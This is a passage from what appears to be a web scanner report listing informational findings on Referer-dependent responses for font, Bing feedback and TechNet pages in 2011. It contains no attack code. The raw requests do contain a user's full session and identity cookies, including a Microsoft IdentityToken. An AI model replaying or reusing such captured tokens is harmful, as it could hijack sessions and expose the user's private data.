GET /d/ccdadc2e-26c9-48a5-9c52-9c3cc58e9930.ttf?d44f19a684109620e484167caf90e81819866d045e31cce038878c86c740c0bdaf80c2286661688a14bccd69f8e332abe0e144e17427fe581b3c47f72fa2ca3f1780dfa17ce5a28df786b62e539f49a80bdf4c3b1655ae6a9ea15efbb39a1387bcd0076a57c8f4425a4ea53f114256e69a6f741f3f8e662d5fe7ecf5b4c1fdea33e2db6dd5ee17b0ea2512fd0b63102642190b3f73e2a9501833d789386505ae96cfe511258fe86de33fee29d49d10f5da53799a2cc4a496130178267cd0667e965619facb8aa44ce1d3465b2f4644cba5f4daee98b8b10edd8d49d79fa1075de217d3d8a4bb22cb843a2a9d2b420836ef7be403724764f3bebada27c2457879a821&projectId=ff15d4d3-b8d1-4d30-9c24-ac5254ba91fc HTTP/1.1
Host: fast.fonts.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Content-Type: application/octet-stream
Date: Sat, 26 Mar 2011 01:40:26 GMT
ETag: "206117125"
Expires: Sat, 26 Mar 2011 01:45:26 GMT
Last-Modified: Mon, 26 Jul 2010 11:03:08 GMT
Server: ECS (dca/5338)
X-Cache: HIT
Content-Length: 66996

...........pOS/2Z..........`cmap.C.A...\....cvt .......(....fpgm.Y.7...H...sgasp............glyf...........8head..GY.......6hhea.c.....4...$hmtx..-M...X....kern-}6k......0.loca.k..........maxp...t....... name.U.........8post...<....... prep<......(...............................2................./...
........ITC ...!".......H.............v. . .....................,. ......~...1.S.a.x.~........ . . . " & 0 : .!"...... ...1.R.`.x.}........ . . . & 0 9 .!"...........q.e.O.K.8.....................2...................................................P.>.Z.D...
...
...
.....v.
.....,K..    PX....Y......D...    .._^-..., EiD..`-...,...*!-..., F..%FRX#Y . .Id. F had..%F hadRX#e.Y/ ..SXi ..TX!.@Y.i ..TX!.@eYY:-..., F..%FRX#.Y F jad..%F jadRX#.Y/.-...,K ..&PXQX..D..@DY.!! E..PX..D.!YY-..., EiD..` E}i.D..`-...,...*-...,K ..&SX.@...Y.. ..&SX#!......#Y ..&SX#!.......#Y ..&SX#!.......#Y ..&SX#!..@....#Y ...&SX..%E...PX#!...#!...%E#!#!Y.!YD-..    ,KSXED.!!Y-............_.....v....o..
......+....EX.../.....>Y...EX.../......>Y......A..........'...7...G...W...g...w...........
]A...........]017"/..4;.2....#...#"&54632..    ..
F
...) .. .. .    ...

...    .. .. ....)....v...#.5....EX.../.....>Y...EX.../.....>Y..............#.01."/...54;.2......+."/...54;.2......#.    ....
D
......    ....
D
.......    ....        ....        ....        ....    ....$....v.|........EX..)/...).>Y...EX..+/...+.>Y...EX..;/...;.>Y...EX..=/...=.>Y...EX..%/...%.    >Y...EX..7/...7.    >Y...EX..I/...I.    >Y...EX..L/...L.    >Y...EX.../......>Y...EX..h/...h..>Y...EX..j/...j..>Y...EX..z/...z..>Y......
..+..%.........R...S.......[...
...d...
...v.......}...S.........013"54?.>.54+."546?.6;.2?.>.54+."546?.6;.2?.6;.2........
...[SNIP]...

Request 2

GET /d/ccdadc2e-26c9-48a5-9c52-9c3cc58e9930.ttf?d44f19a684109620e484167caf90e81819866d045e31cce038878c86c740c0bdaf80c2286661688a14bccd69f8e332abe0e144e17427fe581b3c47f72fa2ca3f1780dfa17ce5a28df786b62e539f49a80bdf4c3b1655ae6a9ea15efbb39a1387bcd0076a57c8f4425a4ea53f114256e69a6f741f3f8e662d5fe7ecf5b4c1fdea33e2db6dd5ee17b0ea2512fd0b63102642190b3f73e2a9501833d789386505ae96cfe511258fe86de33fee29d49d10f5da53799a2cc4a496130178267cd0667e965619facb8aa44ce1d3465b2f4644cba5f4daee98b8b10edd8d49d79fa1075de217d3d8a4bb22cb843a2a9d2b420836ef7be403724764f3bebada27c2457879a821&projectId=ff15d4d3-b8d1-4d30-9c24-ac5254ba91fc HTTP/1.1
Host: fast.fonts.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 403 Forbidden
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Content-Type: text/html
Date: Sat, 26 Mar 2011 01:40:32 GMT
Expires: Sat, 26 Mar 2011 01:45:32 GMT
Server: ECS (dca/5338)
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>403 - Forbidden</title>
   </head>
   <body>
       <h1>403 - Forbidden</h1>
   </body>
</html>
18.3. https://feedback.discoverbing.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://feedback.discoverbing.com
Path:   /default.aspx

Request 1

GET /default.aspx?mkt=en-us&productkey=binglocal&brand=&&locale=en-us&P1=footerlivelocal&P4=LIVE&P2=http%3A%2F%2Fwww.bing.com%2Fmaps%2F%3Fv%3D2%26cp%3D42.35596934774129~-71.05408050119877%26lvl%3D15%26dir%3D0%26sty%3Dr%26where1%3D02110%252C%2520MA%26q%3D02110&P9=42.35596934774129/-71.05408050119877&searchtype=Local%20Search&backurl=http%3A%2F%2Fwww.bing.com%2Fmaps%2F%3Fv%3D2%26cp%3D42.35596934774129~-71.05408050119877%26lvl%3D15%26dir%3D0%26sty%3Dr%26where1%3D02110%252C%2520MA%26q%3D02110&scrx=1 HTTP/1.1
Host: feedback.discoverbing.com
Connection: keep-alive
Referer: https://feedback.discoverbing.com/default.aspx?mkt=en-us&productkey=binglocal&brand=&&locale=en-us&P1=footerlivelocal&P4=LIVE&P2=http%3A%2F%2Fwww.bing.com%2Fmaps%2F%3Fv%3D2%26cp%3D42.35596934774129~-71.05408050119877%26lvl%3D15%26dir%3D0%26sty%3Dr%26where1%3D02110%252C%2520MA%26q%3D02110&P9=42.35596934774129/-71.05408050119877&searchtype=Local%20Search&backurl=http%3A%2F%2Fwww.bing.com%2Fmaps%2F%3Fv%3D2%26cp%3D42.35596934774129~-71.05408050119877%26lvl%3D15%26dir%3D0%26sty%3Dr%26where1%3D02110%252C%2520MA%26q%3D02110
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: takemeback=takemeback=http%3a%2f%2fwww.bing.com%2fmaps%2f%3fv%3d2%26cp%3d42.35596934774129%7e-71.05408050119877%26lvl%3d15%26dir%3d0%26sty%3dr%26where1%3d02110%252C%2520MA%26q%3d02110; LNG=feedback.discoverbing.com=en-us; MSIDCookie=33f87e5c-7c8d-48b0-8858-d3cd02b35031

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 26 Mar 2011 01:00:06 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: takemeback=takemeback=http%3a%2f%2fwww.bing.com%2fmaps%2f%3fv%3d2%26cp%3d42.35596934774129%7e-71.05408050119877%26lvl%3d15%26dir%3d0%26sty%3dr%26where1%3d02110%252C%2520MA%26q%3d02110; expires=Sat, 26-Mar-2011 02:00:06 GMT; path=/
Set-Cookie: LNG=feedback.discoverbing.com=en-us; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: scrx=1; expires=Mon, 26-Mar-2012 01:00:06 GMT; path=/
Vary: Accept-Encoding
Content-Length: 26967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><hea
...[SNIP]...
<img id="StatsDotNetImgNoScript" alt="" src="/LTS/default.aspx?SSID=15&MSID=33f87e5c-7c8d-48b0-8858-d3cd02b35031&SiteLCID=1033&RefURL=https%3a%2f%2ffeedback.discoverbing.com%2fdefault.aspx%3fmkt%3den-us%26productkey%3dbinglocal%26brand%3d%26%26locale%3den-us%26P1%3dfooterlivelocal%26P4%3dLIVE%26P2%3dhttp%3a%2f%2fwww.bing.com%2fmaps%2f%3fv%3d2%26cp%3d42.35596934774129%7e-71.05408050119877%26lvl%3d15%26dir%3d0%26sty%3dr%26where1%3d02110%25252C%252520MA%26q%3d02110%26P9%3d42.35596934774129%2f-71.05408050119877%26searchtype%3dLocal%20Search%26backurl%3dhttp%3a%2f%2fwww.bing.com%2fmaps%2f%3fv%3d2%26cp%3d42.35596934774129%7e-71.05408050119877%26lvl%3d15%26dir%3d0%26sty%3dr%26where1%3d02110%25252C%252520MA%26q%3d02110&ContentType=DM&EventCollectionID=1&FlexId=12&FlexValue4=mozilla%2f5.0%20(windows%3b%20u%3b%20windows%20nt%206.1%3b%20en-us)%20applewebkit%2f534.16%20(khtml%2c%20like%20gecko)%20chrome%2f10.0.648.151%20safari%2f534.16&FlexValue1=bingfeedback&FlexValue2=windowslive_feedback_form&FlexValue3=binglocal&FlexValue5=all|feedback|free|&PassportStatus=0&URL=https%3a%2f%2ffeedback.discoverbing.com%2fdefault.aspx%3fmkt%3den-us%26productkey%3dbinglocal%26brand%3d%26%26locale%3den-us%26P1%3dfooterlivelocal%26P4%3dLIVE%26P2%3dhttp%3a%2f%2fwww.bing.com%2fmaps%2f%3fv%3d2%26cp%3d42.35596934774129%7e-71.05408050119877%26lvl%3d15%26dir%3d0%26sty%3dr%26where1%3d02110%25252C%252520MA%26q%3d02110%26P9%3d42.35596934774129%2f-71.05408050119877%26searchtype%3dLocal%20Search%26backurl%3dhttp%3a%2f%2fwww.bing.com%2fmaps%2f%3fv%3d2%26cp%3d42.35596934774129%7e-71.05408050119877%26lvl%3d15%26dir%3d0%26sty%3dr%26where1%3d02110%25252C%252520MA%26q%3d02110%26scrx%3d1&ContentId=windowslive_feedback_form" /></form></body></html>
<!--
CIADABLU2020WEBAB11
3.19.6.0
begin    0    0
end    0    0
-->

Request 2

GET /default.aspx?mkt=en-us&productkey=binglocal&brand=&&locale=en-us&P1=footerlivelocal&P4=LIVE&P2=http%3A%2F%2Fwww.bing.com%2Fmaps%2F%3Fv%3D2%26cp%3D42.35596934774129~-71.05408050119877%26lvl%3D15%26dir%3D0%26sty%3Dr%26where1%3D02110%252C%2520MA%26q%3D02110&P9=42.35596934774129/-71.05408050119877&searchtype=Local%20Search&backurl=http%3A%2F%2Fwww.bing.com%2Fmaps%2F%3Fv%3D2%26cp%3D42.35596934774129~-71.05408050119877%26lvl%3D15%26dir%3D0%26sty%3Dr%26where1%3D02110%252C%2520MA%26q%3D02110&scrx=1 HTTP/1.1
Host: feedback.discoverbing.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: takemeback=takemeback=http%3a%2f%2fwww.bing.com%2fmaps%2f%3fv%3d2%26cp%3d42.35596934774129%7e-71.05408050119877%26lvl%3d15%26dir%3d0%26sty%3dr%26where1%3d02110%252C%2520MA%26q%3d02110; LNG=feedback.discoverbing.com=en-us; MSIDCookie=33f87e5c-7c8d-48b0-8858-d3cd02b35031

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 26 Mar 2011 01:01:01 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: takemeback=takemeback=http%3a%2f%2fwww.bing.com%2fmaps%2f%3fv%3d2%26cp%3d42.35596934774129%7e-71.05408050119877%26lvl%3d15%26dir%3d0%26sty%3dr%26where1%3d02110%252C%2520MA%26q%3d02110; expires=Sat, 26-Mar-2011 02:01:01 GMT; path=/
Set-Cookie: LNG=feedback.discoverbing.com=en-us; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: scrx=1; expires=Mon, 26-Mar-2012 01:01:01 GMT; path=/
Vary: Accept-Encoding
Content-Length: 26381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><hea
...[SNIP]...
<img id="StatsDotNetImgNoScript" alt="" src="/LTS/default.aspx?SSID=15&MSID=33f87e5c-7c8d-48b0-8858-d3cd02b35031&SiteLCID=1033&RefURL=&ContentType=DM&EventCollectionID=1&FlexId=12&FlexValue4=mozilla%2f5.0%20(windows%3b%20u%3b%20windows%20nt%206.1%3b%20en-us)%20applewebkit%2f534.16%20(khtml%2c%20like%20gecko)%20chrome%2f10.0.648.151%20safari%2f534.16&FlexValue1=bingfeedback&FlexValue2=windowslive_feedback_form&FlexValue3=binglocal&FlexValue5=all|feedback|free|&PassportStatus=0&URL=https%3a%2f%2ffeedback.discoverbing.com%2fdefault.aspx%3fmkt%3den-us%26productkey%3dbinglocal%26brand%3d%26%26locale%3den-us%26P1%3dfooterlivelocal%26P4%3dLIVE%26P2%3dhttp%3a%2f%2fwww.bing.com%2fmaps%2f%3fv%3d2%26cp%3d42.35596934774129%7e-71.05408050119877%26lvl%3d15%26dir%3d0%26sty%3dr%26where1%3d02110%25252C%252520MA%26q%3d02110%26P9%3d42.35596934774129%2f-71.05408050119877%26searchtype%3dLocal%20Search%26backurl%3dhttp%3a%2f%2fwww.bing.com%2fmaps%2f%3fv%3d2%26cp%3d42.35596934774129%7e-71.05408050119877%26lvl%3d15%26dir%3d0%26sty%3dr%26where1%3d02110%25252C%252520MA%26q%3d02110%26scrx%3d1&ContentId=windowslive_feedback_form" /></form></body></html>
<!--
CIADABLU2020WEBAB11
3.19.6.0
begin    0    0
end    0    0
-->
18.4. http://fonts.citysbest.com/k/uni0vle-e.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://fonts.citysbest.com
Path:   /k/uni0vle-e.css

Request 1

GET /k/uni0vle-e.css?3bb2a6e53c9684ffdc9a9afe1b5b2a62161fbabe860bcaa1511187a688f40137427ddfe1e23e854aa7ae99cf666e8bb2e4a145fd987672fc579851ac33383c64a404166105abae023ce7c3a10a67aa5895 HTTP/1.1
Host: fonts.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1301171827082-New%7C1364243827082%3B%20s_nrgvo%3DNew%7C1364243827091%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Server: nginx/0.8.36
Content-Type: text/css
Last-Modified: Tue, 28 Dec 2010 16:49:44 GMT
Content-Length: 209403
Vary: Accept-Encoding
Cache-Control: public, max-age=73
Date: Sat, 26 Mar 2011 20:36:22 GMT
Connection: close

/*{"mac":"1:972ea77fb3e098280cda355606f3aa868d3f46016b2cbd532e306ceb6cc26fa2","created":"2010-12-28T16:49:43Z","k":"0.7.24","version":"2212546"}*/
/*
* The fonts and font delivery service used on this website are provided via
* Typekit, and are subject to the End User License Agreement entered into by
* the website owner. All other parties are explicitly restricted from using,
* in any manner, the Services, Licensed Fonts, or Licensed Content. Details
* about using Typekit, the EULA, and information about the fonts are listed
* below.
*
* @allow http://*.citysbest.com
* @allow http://citysbest.com
* @allow https://*.citysbest.com
* @allow https://citysbest.com
*
* @name Museo Sans
* @vendorname exljbris Font Foundry
* @vendorurl http://www.josbuivenga.demon.nl/index.html
* @licenseurl http://typekit.com/fonts/3af28b8082/eula
*
* @name Myriad Pro
* @vendorname Adobe
* @vendorurl http://www.adobe.com/type/
* @licenseurl http://typekit.com/fonts/8e02145c28/eula
*
* @name P22 Underground
* @vendorname P22
* @vendorurl http://www.p22.com
* @licenseurl http://typekit.com/fonts/5377f80815/eula
*
* (c) 2010 Small Batch Inc.
*/

@font-face {
font-family:"museo-sans-1";
src:url(data:font/opentype;base64,d09GRgABAAAAAEg8ABIAAAAAnVgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABGRlRNAABIIAAAABwAAAAcVLS2+kdERUYAAEA8AAAAHwAAACAA+wAGR1BPUwAAQKwAAAd0AAAa7JDFmmhHU1VCAABAXAAAAFAAAABeLTgqjU9TLzIAAAIIAAAAUQAAAGB+pKXJY21hcAAABHgAAAFlAAABqgiplhVjdnQgAAAHOAAAABoAAAAaAuYELGZwZ20AAAXgAAABAgAAAXMGWJw2Z2FzcAAAQDQAAAAIAAAACP//AANnbHlmAAAI9AAANEAAAHLk1Xz2cGhlYWQAAAGUAAAAMwAAADb0h5sXaGhlYQAAAcgAAAAdAAAAJAchA5ZobXR4AAACXAAAAhwAAAM4rw0zx2xvY2EAAAdUAAABngAAAZ4LSe/2bWF4cAAAAegAAAAgAAAAIALeAVVuYW1lAAA9NAAAAaAAAAKd1eLNFXBvc3QAAD7UAAABYAAAAdMBjQ9zcHJlcA
...[SNIP]...

Request 2

GET /k/uni0vle-e.css?3bb2a6e53c9684ffdc9a9afe1b5b2a62161fbabe860bcaa1511187a688f40137427ddfe1e23e854aa7ae99cf666e8bb2e4a145fd987672fc579851ac33383c64a404166105abae023ce7c3a10a67aa5895 HTTP/1.1
Host: fonts.citysbest.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1301171827082-New%7C1364243827082%3B%20s_nrgvo%3DNew%7C1364243827091%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 403 Forbidden
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 301
Expires: Sat, 26 Mar 2011 20:36:26 GMT
Date: Sat, 26 Mar 2011 20:36:26 GMT
Connection: close
Vary: Accept-Encoding

<HTML><HEAD>
<TITLE>Access Denied</TITLE>
</HEAD><BODY>
<H1>Access Denied</H1>

You don't have permission to access "http&#58;&#47;&#47;fonts&#46;citysbest&#46;com&#47;k&#47;uni0vle&#45;e&#46;css&#63;" on this server.<P>
Reference&#32;&#35;18&#46;34ce8f18&#46;1301171786&#46;a279e583
</BODY>
</HTML>
18.5. http://technet.microsoft.com/en-us/magazine/ff426023.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://technet.microsoft.com
Path:   /en-us/magazine/ff426023.aspx

Request 1

GET /en-us/magazine/ff426023.aspx HTTP/1.1
Host: technet.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/magazine/gg703766.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; BPFC=:en:; CommunityServer-UserCookie2101=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Tue%2c+01+Mar+2011+15%3a49%3a43+GMT; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; Sto.UserLocale=en-us; ADS=SN=175A21EF; WT_NVR=0=/:1=en-us:2=en-us/security|en-us/subscriptions|en-us/evalcenter|en-us/magazine:3=en-us/subscriptions/downloads; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; omniID=ue; s_cc=true; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301092937570:ss=1301092848759; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi]0001:@E0I02h:@E0I; s_sq=msstotn%2Cmsstotnonly%2Cmsstotnmktenus%2Cmsstotncentroll%2Cmsstotnctmag%3D%2526pid%253Dtechnet%25253A/en-us/magazine/gg703766%2526pidt%253D1%2526oid%253Dhttp%25253A//technet.microsoft.com/en-us/magazine/ff426023.aspx%2526ot%253DA

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:41:33 GMT
Content-Length: 47897


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head"><link
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUBMGQYMQVHY3RsMDAkTVRDb250ZW50U2VsZWN0b3IxJG1haW5Db250ZW50Q29udGFpbmVyJGR5bmFtaWNtYWdhemluZVckQ29kZVZpZXcPZ2QFSmN0bDAwJE1UQ29udGVudFNlbGVjdG9yMSRtYWluQ29udGVudENvbnRhaW5lciRkeW5hbWljbWFnYXppbmVCJFJlc3VsdHNWaWV3D2dkBUdjdGwwMCRNVENvbnRlbnRTZWxlY3RvcjEkbWFpbkNvbnRlbnRDb250YWluZXIkZHluYW1pY21hZ2F6aW5lRSRDb2RlVmlldw9nZAVIY3RsMDAkTVRDb250ZW50U2VsZWN0b3IxJG1haW5Db250ZW50Q29udGFpbmVyJGR5bmFtaWNtYWdhemluZUkkSW5kZXhWaWV3DxQrAA5kZGRkZGRkPCsABgACBmRkZGYC/////w9kBUdjdGwwMCRNVENvbnRlbnRTZWxlY3RvcjEkbWFpbkNvbnRlbnRDb250YWluZXIkZHluYW1pY21hZ2F6aW5lRCRDb2RlVmlldw9nZAVKY3RsMDAkTVRDb250ZW50U2VsZWN0b3IxJG1haW5Db250ZW50Q29udGFpbmVyJGR5bmFtaWNtYWdhemluZVUkUmVzdWx0c1ZpZXcPZ2QFSGN0bDAwJE1UQ29udGVudFNlbGVjdG9yMSRtYWluQ29udGVudENvbnRhaW5lciRkeW5hbWljbWFnYXppbmVVJEluZGV4Vmlldw8UKwAOZGRkZGRkZBQrAAFkAgFkZGRmAv////8PZAVKY3RsMDAkTVRDb250ZW50U2VsZWN0b3IxJG1haW5Db250ZW50Q29udGFpbmVyJGR5bmFtaWNtYWdhemluZUwkUmVzdWx0c1ZpZXcPZ2QFSmN0bDAwJE1UQ29udGVudFNlbGVjdG9yMSRtYWluQ29udGVudENvbnRhaW5lciRkeW5hbWljbWFnYXppbmVJJFJlc3VsdHNWaWV3D2dkBUpjdGwwMCRNVENvbnRlbnRTZWxlY3RvcjEkbWFpbkNvbnRlbnRDb250YWluZXIkZHluYW1pY21hZ2F6aW5lVCRSZXN1bHRzVmlldw9nZAVHY3RsMDAkTVRDb250ZW50U2VsZWN0b3IxJG1haW5Db250ZW50Q29udGFpbmVyJGR5bmFtaWNtYWdhemluZUckQ29kZVZpZXcPZ2QFSmN0bDAwJE1UQ29udGVudFNlbGVjdG9yMSRtYWluQ29udGVudENvbnRhaW5lciRkeW5hbWljbWFnYXppbmVPJFJlc3VsdHNWaWV3D2dkBUdjdGwwMCRNVENvbnRlbnRTZWxlY3RvcjEkbWFpbkNvbnRlbnRDb250YWluZXIkZHluYW1pY21hZ2F6aW5lUCRDb2RlVmlldw9nZAVKY3RsMDAkTVRDb250ZW50U2VsZWN0b3IxJG1haW5Db250ZW50Q29udGFpbmVyJGR5bmFtaWNtYWdhemluZUMkUmVzdWx0c1ZpZXcPZ2QFSmN0bDAwJE1UQ29udGVudFNlbGVjdG9yMSRtYWluQ29udGVudENvbnRhaW5lciRkeW5hbWljbWFnYXppbmVIJFJlc3VsdHNWaWV3D2dkBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUiY3RsMDAkTWFzdGhlYWQkU2VhcmNoJFNlYXJjaEJ1dHRvbgVKY3RsMDAkTVRDb250ZW50U2VsZWN0b3IxJG1haW5Db250ZW50Q29udGFpbmVyJGR5bmFtaWNtYWdhemluZVAkUmVzdWx0c1ZpZXcPZ2QFSmN0bDAwJE1UQ29udGVudFNlbGVjdG9yMSRtYWluQ29udGVudENvbnRhaW5lciRkeW5hbWljbWFnYXppbmVGJFJlc3VsdHNWaWV3D2dkBUdjdGwwMCRNVENvbnRlbnRTZWxlY3RvcjEkbWFpbkNvbnRlbnRDb250YWluZXIkZHluYW1pY21hZ2F6aW5lTCRDb2RlVmlldw9nZAVIY3RsMDAkTVRDb250ZW50U2VsZWN0b3IxJG1haW5Db250ZW50Q2
...[SNIP]...

Request 2

GET /en-us/magazine/ff426023.aspx HTTP/1.1
Host: technet.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
